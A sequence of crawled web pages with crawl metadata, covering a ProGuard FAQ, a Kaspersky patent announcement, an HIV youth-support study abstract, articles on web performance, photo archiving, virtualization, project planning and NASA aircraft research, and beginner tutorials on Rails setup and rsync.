extent in its optimization techniques. ProGuard's closed-source sibling for Android, DexGuard, does offer control flow obfuscation, as one of the many additional techniques to harden Android apps. Yes. This feature allows you to specify a previous obfuscation mapping file in a new obfuscation step, in order to produce add-ons or patches for obfuscated code. Yes. You can specify your own obfuscation dictionary, such as a list of reserved key words, identifiers with foreign characters, random source files, or a text by Shakespeare. Note that this hardly improves the obfuscation. Decent decompilers can automatically replace reserved keywords, and the effect can be undone fairly easily, by obfuscating again with simpler names. Yes. ProGuard comes with a companion tool, ReTrace, that can 'de-obfuscate' stack traces produced by obfuscated applications. The reconstruction is based on the mapping file that ProGuard can write out. If line numbers have been obfuscated away, a list of alternative method names is presented for each obfuscated method name that has an ambiguous reverse mapping. Please refer to the ProGuard User Manual for more details. Erik André at Badoo has written a tool to de-obfuscate HPROF memory dumps. DexGuard is a commercial extension of ProGuard:
<urn:uuid:b9e9b841-c1e2-45cf-a343-c3fa28be33f3>
CC-MAIN-2017-04
https://www.guardsquare.com/en/proguard/faq
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00172-ip-10-171-10-70.ec2.internal.warc.gz
en
0.890135
1,594
2.921875
3
Kaspersky Lab, a leading developer of secure content management solutions, announces the successful patenting of cutting-edge IT security technology in the US. The technology enables detection and removal of all malicious programs, including those that were previously unknown, installed on a user’s computer after a single virus incident. Today’s malware makes extensive use of Trojans to penetrate users’ machines. Once downloaded and installed on a system, a Trojan downloads numerous other malicious programs from the Internet. As a result, dozens of various malicious codes and their components can end up on a user’s PC. Some of them may be new malicious programs with signatures that have yet to be added to antivirus databases or that make use of unknown technology for evading detection. Malware like this can go undetected by antivirus solutions for some time, carrying out harmful or destructive operations on an infected computer. This flaw in antivirus protection makes the task of detecting and removing all malicious programs and their components downloaded and installed on a user’s computer as a result of a single virus incident, including previously unknown malware, all the more important. This defect can now be solved using the latest Kaspersky Lab technology developed by Mikhail Pavlyushchik. The technology was granted Patent No. 7472420 by the US Patent and Trademark Office on 30 December, 2008. The patent outlines the method used to detect and remove all malicious programs installed on a user’s computer as a result of a single virus incident as well as locating the source and time of the incident. The new technology is based on the logging of system events which indicate the possibility of a virus infection (for example, modification of an executable file and/or a record in the system registry) and then determining the extent of a virus incident based on the records made. According to the patented technology, when a malicious process or file is detected, a module that analyses preceding events is launched that allows the source and the time of an infection to be determined. The system then analyzes all child events related to the source event, which makes it possible to detect all malicious programs involved in the incident, including those that were previously unknown. In addition to detecting malware, the new technology removes or quarantines malicious code, interrupts malicious processes, and restores the system files from a trusted backup. Information about malicious programs detected with the help of the patented method can be immediately sent to antivirus vendors in order to speed up their response times to new threats. Determining the source and context of an infection is helpful in preventing similar virus incidents in the future, for example, in detecting and blocking infected sites, detecting and eliminating software vulnerabilities, etc. Furthermore, reconstructing the full picture of an incident and documenting it could provide the basis for building a successful criminal case against the cybercriminals responsible. Kaspersky Lab currently has more than 30 patent applications pending in the US and Russia. These relate to a range of technologies developed by company personnel. Additionally, many of today’s antivirus technologies were developed by Kaspersky Lab and are currently used under license by vendors worldwide, including Microsoft, Bluecoat, Juniper Networks, Clearswift, Borderware, Checkpoint, Sonicwall, Websense, LanDesk, Alt-N, ZyXEL, ASUS and D-Link.
<urn:uuid:0e4d47fe-8f88-458c-a13c-42500a648d9a>
CC-MAIN-2017-04
http://www.kaspersky.com/pt/about/news/press/2009/Kaspersky_Lab_s_cutting-edge_technology_for_combating_unknown_threats_granted_US_patent
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00017-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932783
688
2.6875
3
Mavhu W.,University of Zimbabwe | Mavhu W.,Center for Sexual Health and Research Zimbabwe CeSHHAR Zimbabwe | Mavhu W.,University College London | Chirawu P.,University of Zimbabwe | And 11 more authors. PLoS ONE | Year: 2013 Background:There is a recognized gap in the evidence base relating to the nature and components of interventions to address the psycho-social needs of HIV positive young people. We used mixed methods research to strengthen a community support group intervention for HIV positive young people based in Harare, Zimbabwe.Methods:A quantitative questionnaire was administered to HIV positive Africaid support group attendees. Afterwards, qualitative data were collected from young people aged 15-18 through tape-recorded in-depth interviews (n = 10), 3 focus group discussions (FGDs) and 16 life history narratives. Data were also collected from caregivers, health care workers, and community members through FGDs (n = 6 groups) and in-depth interviews (n = 12). Quantitative data were processed and analysed using STATA 10. Qualitative data were analysed using thematic analysis.Results:229/310 young people completed the quantitative questionnaire (74% participation). Median age was 14 (range 6-18 years); 59% were female. Self-reported adherence to antiretrovirals was sub-optimal. Psychological well being was poor (median score on Shona Symptom Questionnaire 9/14); 63% were at risk of depression. Qualitative findings suggested that challenges faced by positive children include verbal abuse, stigma, and discrimination. While data showed that support group attendance is helpful, young people stressed that life outside the confines of the group was more challenging. Caregivers felt ill-equipped to support the children in their care. These data, combined with a previously validated conceptual framework for family-centred interventions, were used to guide the development of the existing programme of adolescent support groups into a more comprehensive evidence-based psychosocial support programme encompassing caregiver and household members.Conclusions:This study allowed us to describe the lived experiences of HIV positive young people and their caregivers in Zimbabwe. The findings contributed to the enhancement of Africaid's existing programme of support to better promote psychological well being and ART adherence. © 2013 Mavhu et al. Source
<urn:uuid:d68f0d07-750a-4296-8ca5-9cda5d682779>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/center-for-sexual-health-and-research-ceshhar-zimbabwe-665481/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00255-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941825
475
2.5625
3
A World of Content on Every Web Site Solving the Performance Challenges for Media and Portal Sites In April 2009, Google sent a video reporter to Times Square to ask passers-by to answer the simple question, “What is a browser?” (See the video). Fewer than 8 percent of the respondents could answer the question correctly. It would be interesting to follow up this random survey with the similarly disarming question, “What is a Web site?” No doubt the average Internet user would find that question equally, if not more, challenging. Wikipedia (see accompanying interview) defines a Web site this way: A website (also spelled Web site or web site) is a collection of related web pages, images, videos or other digital assets that are addressed with a common domain name or IP address in an Internet Protocol-based network. A web site is hosted on at least one web server, accessible via a network such as the Internet or a private local area network. A web page is a document, typically written in plain text interspersed with formatting instructions of Hypertext Markup Language (HTML, XHTML). A web page may incorporate elements from other websites with suitable markup anchors. That definition encompasses the many elements and permutations that make up a Web page or site. But to the average Internet user, a Web site is a single destination that delivers information or entertainment in various forms — video streams, photos, localized weather, feature stories. What does it matter where the content is coming from? For the average user (emphasis on average), all the content is coming from the one site they’re visiting. But as anyone who works in the industry is well aware, the content on any given site can originate from a number of sources. Media Mash-Ups and Personalized Portals Perhaps some of the most complicated sites on the Web are media outlets for news, sports, and entertainment, and portal sites like AOL, Yahoo!, iGoogle and the like. These destinations define “rich” content, loaded as they are with video streams, Flash movies, news feeds, tweets and, of course, advertising. Some of the mash-ups are completely transparent. Google News, for example, gives clear attribution to the sources of its stories; none of its content is original. On other sites, pulled-in content is not so obvious. And in most cases, content is being pulled in from multiple sources completely invisibly to the viewer. While it’s not yet the “semantic Web” envisioned a decade ago by Sir Tim Berners-Lee, the man credited with inventing the World Wide Web — a Web where machines can understand, analyze, and combine information in usable ways without human intervention — the fact is that today’s Web relies very much on the free and automatic exchange of content among unrelated sites. Whether it’s external news feeds, product information from a manufacturer, live updates from Twitter, or the ubiquitous ad banners and boxes, more and more Web sites are populating their pages with content that comes from somewhere else on the Web — including owned or outsourced content delivery networks and the site owner’s own affiliated domains. For webmasters, this makes for complicated site performance and user experience challenges. The Complexities of Content “Gone are the days of a simple Web page with one or two people updating it,” says Shawn White, director of external operations for Keynote. “Nowadays, you have dozens, if not hundreds of servers and computers that are all over the world trying to serve up this content as fast as possible, and being updated by any number of people, including the public. For Web operations and IT managers who are responsible for uptimes and availability, it just makes things a whole lot more complex.” In those days, back near the turn of the century, when sites created and pushed content out more or less from a single source, performance was in the hands of the site owners. They were responsible for implementing and configuring the capacity they needed to handle their expected traffic — and when there were performance lapses, they looked in the mirror to find the sources and solutions. After 9/11, for example, many of the major news sites went down for hours or days. They simply weren’t designed to handle the tremendous surge in visitors as Americans flocked to the Internet for news and updates. These were perhaps the most significant, spontaneous flash crowds that the adolescent Internet saw, and many sites’ inability to handle them was painfully obvious. But the problems were mainly internal capacity and external bandwidth. Fast forward to today. In less than a decade since 9/11, the capacity of the Internet overall and of individual Web sites to handle traffic has increased exponentially — as have user expectations that sites will be available and fast 24/7/365. Today, Web sites are no longer single-source, singly hosted affairs; content is often fed from multiple external sources to populate a page. Bandwidth-intensive, processor-hungry video is everywhere, and is the life blood of many media sites. Flash-crowd events large and small are not uncommon, and by and large, most sites take them reasonably in stride. Site crashing is a much rarer phenomenon, even in the crush of traffic after a tsunami, an historic election, or a plane landing in the Hudson. Site performance, however, can still be significantly degraded by a major surge in traffic. Rooting Out Page-Load Problems One recent event brought many sites to their knees: the death of pop icon Michael Jackson. Akamai reported an 11 percent spike in Internet traffic worldwide in the hour the news was breaking. 1Adotas.com, “Ad Networks, Not Websites, Choked on Michael Jackson News,” by Edward Barrera, July 1, 2009 Major news outlets that are followed in the Keynote Performance Index saw their availability plummet as low as 10 percent. The Los Angeles Times, Jackson’s hometown news site, had significant problems. Analysis revealed, however, that in a number of cases, it was not the site’s inability to handle the surge of traffic, but rather the inability of the third-party servers delivering ads to the sites to keep up with the demand. Pages froze as they waited for the ads to load. And users had to wait for their news, if they got it at all. The Michael Jackson story is a dramatic example, but third-party content can eat away at site performance every day. Ads can be notoriously slow to load, but ads are not the only culprit. Twitter feeds, linked content from other sites, page assets delivered by content delivery networks, even Google analytics embedded in pages — all can slow a site down to uncompetitive, if not unacceptable levels. You can’t have a media site without video, and apparently, if a little video is good, a lot of video is better. It’s the heart and soul of entertainment sites. It’s de rigueur for the broadcast news networks. And the Web has given traditional print journalism brands the opportunity to compete on broadcast journalism’s video turf. New technology has made it almost as easy to shoot, edit and post a video online as to prepare a written story with accompanying photos. Online media sites, with help from YouTube, have enabled a mass Web audience that prefers to watch rather than read. There’s also no faster way to lose an audience than with a video stream that stutters and constantly stops to rebuffer. But again, monitoring streams from multiple servers or domains, and understanding actual end-user performance, is a significant test and measurement challenge. Who’s on First? What’s on Second? Site owners are more pressured than ever to deliver the fast, flawless experiences users now demand, and can often find at a competitor’s site. Monitoring and measuring their performance is no longer the simple task of measuring overall page load time. There’s really nothing a webmaster can do with the information that the site is running slow. Is it their own content? The CDN that’s pushing out their videos? The sister site that’s hosting their image library? The Flash banner promoting upcoming programming on their TV network? Or the ad network servers that supply the bulk of the site’s revenue? How does the site owner identify the bottlenecks, and gain actionable data to demand better performance from weak providers in the content chain? Measuring for Management “When a site is being updated from different sources, you have to be able to figure out where your slowdowns are happening,” White explains. “Is it happening with a third-party ad? Is it with a Twitter or RSS feed? Is it with Flash or some other content that’s being uploaded? “The bottom line is, you can’t manage what you don’t measure. First you have to determine what’s normal for your site. You need a benchmark for what’s normal for you — and that can vary by the hour or day of the week depending on your traffic patterns — and it’s also helpful to benchmark against your competition.” Keynote offers services that drill down into overall page performance to provide sub-data that reflects the mosaic of content types and sources that typify complex media and portal Web pages. Using a suite of fast, simple-to-use tools, individual page components can be isolated or grouped into measurable “virtual pages,” so that the performance impact of each can be specifically characterized. Page components can be filtered by any variety of criteria, including domain, page element, size, and more. Third-party content providers — and internal resource managers — can then be held accountable for any performance shortcomings. Or the construction of the page itself can be tweaked for greater responsiveness. “There are a number of ways that IT managers, webmasters and Web developers can implement improvements,” White says. “It’s surprising that there’s still a lot of people who don’t use these fundamental tricks of the trade; they either just don’t know about them or it hasn’t been as big of an issue. “So they’re preloading advertisements or putting ads first in the code; one fix could be as simple as making the ads last to load on the page. Using Keynote tools, you can make adjustments and measure to see if it has any effect, and repeat that process on various components until the page actually meets your requirements for responsiveness.” Mobile Web the New Mainstream? Love it or hate it, the iPhone has dramatically changed the way masses of consumers use the Web. For media companies and online portals like AOL and Google, an online presence is not complete without a robust mobile site and/or application. Delivering an exceptional user experience on a mobile device is fraught with the same challenges as computer-delivered content, with the added complexity of hundreds and hundreds of device profiles, and the bandwidth challenges of cellular signals. And again, the challenge is not only with the site owner’s hosted content, but with third-party feeds including ads and videos. How do you measure what the end-user is actually experiencing? “Can you emulate that experience or do you need to do it from a real iPhone,” White asks. “With Keynote’s Mobile Device Perspective, we have a network of real, actual iPhones around the world. We have real iPhones, connected to computers so we can take a recorded transaction or scenario. We can set up a script that says load the CNN app and click on the first headline, and how long does that take? “We also have a service where we can emulate a phone — or 1,600 different phones — and do similar types of things. The advantage of our emulated service is that we get more details about the network — signal strength, what cell tower is the signal coming through.” Performance Pays — Or Not Slow page loads make for a bad user experience that can cause visitors to abandon sites. Recent studies suggest that visitors expect a page to load in just two seconds. So ad delivery that slows page performance down, or videos that take forever to stream, have a real financial impact. The site owner potentially loses revenue because they are delivering less traffic to the advertiser. The ad networks take a hit because it lowers the number of eyeballs they are delivering as well. And the advertisers themselves are not getting the exposure they are counting on to market their products or services. All three parties then — site owner, ad network and advertiser — have a stake in understanding where the performance issues lie. With accurate performance data in hand, site owners can demand that ad networks perform to their minimum standards, or they can switch their sites to competitive networks (after making sure, that is, that their own page construction is optimized for best performance). Ad networks, in turn, can use the data to improve their delivery or to demonstrate to clients that they are delivering as promised. And advertisers can know if their message is getting out, and if it isn’t, they can explore alternate channels for their advertising. Best Practices for Page Component Testing The only accurate way to gauge page performance for end users is with live testing, in the field, using real browsers located across all the geography being served. Keynote’s testing network includes some 3,000 “typical” computers running Internet Explorer in 80 countries around the world. Tests can be constructed to simply measure home page load times, or to measure a specified task sequence. And with “virtual page” testing, individual page components — ad feeds or Flash movies, for example — can be individually benchmarked. “With the data from this kind of testing,” White says, “IT and site managers can find out, where are my slowdowns? Are my slowdowns regional? Is it East Coast versus West Coast? Is it third-party feeds that are hanging my pages up? Or is it the ISP in a particular region? “At the end of the day, you have to test in Johannesburg to know how your site is performing in Johannesburg. There’s nothing that beats the real thing. And that’s what our testing products do. We go to great lengths to make it as real-life as possible.”
<urn:uuid:85fbb101-61aa-431d-bc28-4d007ec4031c>
CC-MAIN-2017-04
http://www.keynote.com/resources/articles/world-of-content-on-every-web-site-performance
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00467-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93734
3,007
3.25
3
The Bettmann Archive contains some of the world’s most recognizable photographic images – from Marilyn Monroe to Rosa Parks to a work crew perched on a girder above New York City. When Corbis Images acquired the Bettmann Archive in 1995, the challenge was to provide access for Corbis’ client base to this historic trove of images. Working with Iron Mountain, Corbis was able to manage the digitizing and archiving efforts for this massive collection and provide worldwide access to this rich legacy of historically significant visual images. In 1933, Otto Bettmann, an independent art curator fled Nazi Germany with 2 trunks of original photographs. Over the ensuing decades, this collection, known as the Bettman Archive, expanded to include over 11 million images, including iconic photos of the Beatles, Ernest Hemingway, Franklin Roosevelt, and The Kennedys. It is widely considered the most comprehensive collection of historically and culturally important photography in the world. Acquired in 1995 By Corbis Corporation, it is now the crowned jewel of Corbis' collection of over 100 million images. Corbis is a creative resource for advertising, marketing, and media professionals around the world. Corbis provides photographic images, illustrations, film footage. It also provides rights and clearance services. The Bettman Archive contains 11 million images. Prints, negatives, various format of photography. The overall storage in this vault is 20 million images. Corbis had a responsibility to protect this collection: images that the world knows. Image such as Rosa Parks seated in the front of the bus, Marilyn Monroe with her skirt blowing up, Einstein sticking out his tongue. Corbis acquired that collection in 1995 and we were challenged with preserving the collection and providing access to it. Corbis realized that the Bettman Archive was already deteriorating and quickly consulted with Will Hound Imaging Research, an expert on film preservation. After scouring the globe for a secure location that could offer the geological and temperature stability required to protect the original images, Iron Mountain was selected to create a 20,000 sq. ft temperature controlled archive in its high security, underground facility to rest the aging of the original film. In Iron Mountain's secure, underground environment, where temperatures are stabilized at -20 degrees celsius, Corbis expects the Betton collection to remain preserved nearly unchanged for thousands of years. The partnership that was created with Iron Mountain enables us to achieve that. Many of the images in this vault are not scanned, so Corbis staff locates the images and Iron Mountain provides imaging services and scans them. Iron Mountain has built digital studios within its facilities to provide image, audio, and film restoration services to client in the entertainment industry as well as to music labels, museums, and academic institutions. With state-of-the-art mastering suites, digital imaging specialist, film preservationists, and one of the largest collections of vintage media players in the world, Iron Mountain helps to digitize and restore content.
<urn:uuid:e105ceeb-b2fb-4d6f-9ff5-2f70c64a9b4c>
CC-MAIN-2017-04
http://www.ironmountain.com/Knowledge-Center/Reference-Library/View-by-Document-Type/Demonstrations-Videos/Tours/Corbis.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00375-ip-10-171-10-70.ec2.internal.warc.gz
en
0.935019
594
2.703125
3
In this series, I would like to demonstrate some of the basics of building a Ruby on Rails application and how MVC (Model-View-Controller) works. We will discuss some of the security pitfalls as well. Firstly, we need to make sure the tech is understood. That being said, in this first part of the series, let's discuss some general Ruby "stuff" that makes life a little bit easier when dealing with day to day Ruby tasks. RVM, RVM Gemsets, and an RVM resource file. On the surface, Ruby Version Manager (RVM) allows you to host multiple versions of Ruby on your system and easily switch between them. If you go a little deeper, you'll see that RVM also provides the ability to host multiple "Gemsets" within each version of Ruby. This means you can create a Gemset per application and never worry about conflicting dependency versions. One last thing to mention, you can do all of this seamlessly leveraging an .rvmrc file. When you change into the application's folder that holds an .rvmrc file, you will automatically switch Ruby versions and gemset based off the values specified in the rvm resource file (.rvmrc). Firstly, lets choose our Ruby version as well as the name of our Gemset. I'm going to choose Ruby Enterprise Edition (already installed via $ rvm install ree) and name my Gemset after the application, "attackresearch". Shown later. Now let's install Rails and it's required gems Let's create the Rails application! Now let's get the Gemfile and .rvmrc in order. I'm going to add the 'twitter-bootstrap-rails' gem and then perform a "bundle install". Whenever a change is made to your Gems, run 'bundle install' again to update the Gemfile.lock file. The reason for twitter bootstrap will become clear later in these tutorials. Essentially, it allows us to easily create the visual aspects of the application. Now for the .rvmrc file Just to test that the .rvmrc file works, let's leave the directory then navigate back into it. Lastly, perform a 'gem list' to ensure our gems are available. Now let's start it up! Okay, that's enough for now. More to come in the next post :-)
<urn:uuid:f2346e65-cb2d-4a67-8d4c-3ebe5241d31d>
CC-MAIN-2017-04
http://carnal0wnage.attackresearch.com/2012/10/basics-of-rails-part-1.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00191-ip-10-171-10-70.ec2.internal.warc.gz
en
0.909922
495
2.796875
3
Modern technology makes it easier for owners to operate their business. Knowing which technology to use and the right time to implement it is essential if you want to boost productivity as well as reduce operating costs. One of the best ways to do this is to virtualize. While virtualization is being integrated more widely by business owners, many are still questioning what it actually is and whether or not to implement it. Virtualization is the act of migrating physical systems into a virtual environment. In other words, it is the creation of a virtual version of a device or resource; anything from a server to an operating system. By providing a virtual view of computing resources, this allows you to turn one server into a host for a group of servers that all share the same resources. With virtualization, you can instantly access nearly limitless computing resources which allow for faster and broader business capabilities. It also gets rid of haphazard IT rooms, cables, and bulky hardware; reducing your overall IT overhead as well as management costs. While many look at virtualization as the cloud, in reality the cloud is just a part of virtualization. The most important function of virtualization is the capability of running multiple operating systems and applications on a single computer or server. This means increased productivity achieved by fewer servers. Virtualization can usually improve overall application performance due to technology that can balance resources, and provide only what the user needs. Virtualization can be a solution for many businesses, but not for all. The key is to know exactly when to virtualize. Here are four situations where a business could virtualize systems: There are several reasons as to why many businesses look into virtualization. Like any type of technology, it’s a tradeoff between practicality and money. If you think you’re ready to move your systems to a virtual world or are looking to learn more about virtualization solutions, contact us today.
<urn:uuid:981026a8-5b5f-4e37-bf04-2094fb50380c>
CC-MAIN-2017-04
https://www.apex.com/virtualize/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00009-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958221
387
2.53125
3
Project Management Success Factors Part 4 The fourth critical factor for project success is having a well-developed project plan. Here is a six-step approach to creating a project plan, not only showing how it provides a road map for project managers to follow, but also why it is the project manager’s premier communications and control tool throughout the project. Step 1: Explain the Project Plan to Key Stakeholders and Discuss Its Key Components The project plan, one of the most misunderstood terms in project management, is a set of living documents that can be expected to change over the life of the project. Like a road map, it provides the direction for the project. And like the traveler, the project manager needs to set the course for the project, which, in project management terms, means creating the project plan. Just as a driver may encounter road construction or new routes to the final destination, the project manager may need to correct the project course as well. A common misconception is that the plan equates to the project timeline, which is only one of the many components of the plan. The project plan is the major work product from the entire planning process, so it contains all of the planning documents for the project. For example, a project plan for constructing a new office building needs to include not only the specifications for the building, the budget and the schedule, but also the risks, quality metrics, environmental impact, etc. Step 2: Define Roles and Responsibilities Identifying stakeholders, those who have a vested interest in either the project or the project outcome, is challenging and especially difficult on large, risky, high-impact projects. In addition, there are likely to be conflicting agendas and requirements among stakeholders, as well as different slants on who needs to be included. It is important for the project manager to get clarity and agreement on what work needs to be done by whom, as well as which decisions each stakeholder will make. Step 3: Develop a Scope Statement The scope statement is arguably the most important document in the project plan. It is used to gain common agreement among the stakeholders about the project definition. It is the basis for securing the buy-in and agreement from the sponsor and other stakeholders, and decreases the chances of miscommunication. This document will most likely grow and change with the life of the project and should include: - Business need and business problem. - Project objectives, stating what will occur within the project to solve the business problem. - Benefits of completing the project and justification for the project. - Project scope (which deliverables will be included and excluded from the project). - Key milestones, the approach and other components as dictated by the size and nature of the project. The scope statement can be treated as a contract between the project manager and sponsor, one that can only be changed with sponsor approval. Step 4: Develop the Project Baselines The first project baseline you must develop is the scope baseline. Once the deliverables are confirmed in the scope statement, they need to be developed into a work breakdown structure (WBS), which is a decomposition of all the deliverables in the project. The scope baseline includes all the deliverables produced on the project, and therefore identifies all the work to be done. Building an office building, for example, would include a variety of deliverables related to the building itself, as well as such things as impact studies, recommendations, landscaping plans, etc. Schedule and cost baselines must then be developed: - Identify activities and tasks needed to produce each of the deliverables identified in the scope baseline. The level of detail in the task list depends on many factors, including the experience of the project manager and team, project risk and uncertainties, ambiguity of specifications, amount of buy-in expected, etc. - Identify resources for each task, if known. - Estimate how many hours it will take to complete each task. - Estimate cost of each task, using an average hourly rate for each resource. - Consider resource constraints, or how much time each resource can realistically devote to this one project. - Determine which tasks are dependent on other tasks, and develop critical path. - Develop schedule, which is a calendarization of all the tasks and estimates. It shows by chosen time period (week, month, quarter or year) which resource is doing which tasks, how much time they are expected to spend on each task, and when each task is scheduled to begin and end. - Develop the cost baseline, which is a time-phased budget, or cost by time period. This process is not a one-time effort. Throughout the project you will most likely be adding to or repeating some or all of these steps. Step 5: Create Baseline Management Plans Once the scope, schedule and cost baselines have been established, create the steps the team will take to manage variances to these plans. All of these management plans usually include a review and approval process for modifying the baselines. Different approval levels are usually needed for different types of changes. In addition, not all new requests will result in changes to the scope, schedule or budget, but a process is needed to study all new requests to determine their impact to the project. Step 6: Communicate! One important aspect of the project plan is the communications plan. This document states such things as: - Who on the project wants which reports, how often, in what format and using what media. - How issues will be escalated and when. - Where project information will be stored and who can access it. - What new risks have surfaced and what the risk response will include. - What metrics will be used to ensure a quality product is built. - What reserves have been used for which uncertainties. Once the project plan is complete, it is important to communicate its contents to key stakeholders. This communication should include such things as: - Review and approval of the project plan. - Process for changing the contents of the plan. - Next steps—executing and controlling the project plan and key stakeholder roles/responsibilities in the upcoming phases. Developing a clear project plan certainly takes time, and the project manager will probably be tempted to skip the planning and jump straight into execution. However, remember this: The traveler who plans the route before beginning a journey ultimately reaches the intended destination more quickly and more easily than the disorganized traveler, who gets lost along the way. Similarly, the project manager who takes time to create a clear project plan will follow a more direct route toward destination project success. Elizabeth Larson and Richard Larson, co-principals of Edina-based Watermark Learning, have more than 25 years each of experience in business, project management, business analysis and training/consulting. They have presented numerous workshops, seminars and presentations to more than 10,000 participants on project management, requirements analysis and related subjects. E-mail Elizabeth and Richard at email@example.com or firstname.lastname@example.org.
<urn:uuid:c2d03ac6-4835-4933-80fb-5d8604b23a2b>
CC-MAIN-2017-04
http://certmag.com/project-management-success-factors-part-4-create-a-clear-plan/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00457-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929264
1,456
2.5625
3
NASA said this week four research teams would split $16.5 million to continue developing quieter, cleaner, and more fuel-efficient jets that the agency says will be three generations ahead of airliners in use today. NASA said the money was awarded after an 18-month study of all manner of advanced technologies from alloys, ceramic or fiber composites, carbon nanotube and fiber optic cabling to self-healing skin, hybrid electric engines, folding wings, double fuselages and virtual reality windows to come up with a series of aircraft designs that could end up taking you on a business trip by about 2030. More on advanced tech: Gigantic changes keep space technology hot Under the contracts, teams from Boeing, Northrop Grumman, MIT, Cessna will develop models that can be tested in computer simulations, laboratories and wind tunnels. The projects look like this: The Boeing Company's Subsonic Ultra Green Aircraft Research, or SUGAR is a twin-engine aircraft with hybrid propulsion technology, a tube-shaped body and a truss-braced wing mounted to the top. Compared to the typical wing used today, the SUGAR Volt wing is longer from tip to tip, shorter from leading edge to trailing edge, and has less sweep. It also may include hinges to fold the wings while parked close together at airport gates. Projected advances in battery technology enable a unique, hybrid turbo-electric propulsion system. The aircraft's engines could use both fuel to burn in the engine's core, and electricity to turn the turbofan when the core is powered down ($8.8 million) MIT's 180-passenger D8 "double bubble" fuses two aircraft bodies together lengthwise and mounts three turbofan jet engines on the tail. Important components of the MIT concept are the use of composite materials for lower weight and turbofan engines with an ultra high bypass ratio (meaning air flow through the core of the engine is even smaller, while air flow through the duct surrounding the core is substantially larger, than in a conventional engine) for more efficient thrust. In a reversal of current design trends the MIT concept increases the bypass ratio by minimizing expansion of the overall diameter of the engine and shrinking the diameter of the jet exhaust instead ($4.6 million). Northrop Grumman will test models of the leading edge of a jet's wing. If engineers can design a smooth edge without the current standard slats, airplanes would be quieter and consume less fuel at cruise altitudes because of the smoother flow of air over the wings ($1.2 million). Cessna will focus on airplane structure, particularly the aircraft outer covering. Engineers are trying to develop what some call a "magic skin" that can protect planes against lightning, electromagnetic interference, extreme temperatures and object impacts. The skin would heal itself if punctured or torn and help insulate the cabin from noise, NASA says ($1.9 million). Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories:
<urn:uuid:1b754a0f-0232-462b-bac7-ad0be820b5df>
CC-MAIN-2017-04
http://www.networkworld.com/article/2228950/security/nasa-green-lights--16-5-million-to-advance-future-jets.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280872.69/warc/CC-MAIN-20170116095120-00577-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923165
625
3.375
3
Let's face it. Backups are great, but backup systems are even better. And one great tool for cloning your critical servers is rsync. Whether you clone your file systems to second disks or to entirely different servers, rsync can help get the synchronization done cleanly and efficiently. In fact, rsync is one of the best tools for replicating files, directories full of files, and entire file systems -- and for keeping collections of files on multiple systems in sync. It’s both wonderfully efficient and extremely versatile. So let’s take a look at how this tool works and see just how easily you can achieve workable redundancy with this very clever tool. From single files to file systems While the rsync command might not come to mind as a tool for moving a single file from one place to another, it definitely will do this for you. And, if the file that you’re moving is large and you just happen to have an older copy of it sitting on the remote system, you might gain some advantage from rsync’s ability to update files by transmitting only the differences between the source and destination files. This feature is rsync's primary claim to fame and it makes the tool very efficient, especially with respect to the network traffic that it generates. It does, however, mean that you must have rsync installed on both of the systems involved. The primary advantage of rsync is that, under most conditions, it copies only what it needs to copy. Have a large file that you need to synchronize on a remote server and in which only a single byte is different? No problem, rsync will transmit that single byte along after coordinating with rsync on the remote system to determine what it needs to send. Depending on the file you’re copying, this behavior can save you a lot of time and network bandwidth. Copying single files The simplest form of rsync command looks like this: $ rsync helloworld.py /tmp That’s basically just a copy from-here to-there command though, in such a simple example, rsync isn’t likely to exactly shine. And, like scp, rsync can push files to a remote system or to pull files from a remote system if you just reverse the order of the systems. $ rsync localfile remote-server:/tmp $ rsync remote-server:/tmp/remotefile /tmp Rsync also offers the generally useful advantage of creating a missing destination directory if you just end your destination argument with a / as shown in the example below (3rd line). You can, however, only go one level deep with this. If you need your copied file to be deeply nested in a new directory structure, try using mkdir –p with the full directory path first. $ ls -l /tmp/uploads ls: /tmp/uploads: No such file or directory $ rsync helloworld.py /tmp/uploads/ $ ls -l /tmp/uploads total 4 -rw-r--r-- 1 sbob staff 1237 Feb 29 16:54 helloworld.py Here, we’re copying to a local directory and providing a subdirectory that we want to create. The first command was run just to show that the directory didn’t already exist. And, yes, this technique works whether you’re copying files to a local or to a remote location. $ rsync helloworld.py remote-server:/tmp/uploads/ Copying entire directories Copying an entire directory takes almost no additional effort. In the example below, we’re copying a directory, rather than a single file. $ rsync -av localdir remote-server:/home/sbob building file list ... done localdir/ localdir/phase1 localdir/phase2 localdir/phase3 localdir/completion/ localdir/completion/ phase4 sent 32535 bytes received 120 bytes 178.00 bytes/sec total size is 0 speedup is 0.00 Notice that I tossed in a couple options with this command -– the -a and -v options. The -a option is a little deceptive. It means “archive mode”. This is something of a shortcut as it takes the place of a string of options that you invoke with just this one letter -- namely –r, -l, -p, -t, -g, -o, and –D. So, with this single option, you get the command to run recursively; copy symbolic links as symbolic links (i.e., rather than creating regular files); and preserve permissions, time stamps, group and owner settings, devices, and special files. So, with this one option, you get the behavior that you’re likely to want when replicating a group of files -- namely they'll be the same both in content and metadata as the original files. In the example below, we copy a single fairly large file. From the numbers shown, you can see that the file was compressed (see the "sent bytes" figure) and that a significant speedup in the transfer was achieved. $ ls -l bigfile -rwxr--r-- 1 sbob staff 7350358 Aug 3 2015 bigfile $ rsync -avzh bigfile remote-server:/tmp building file list ... done bigfile 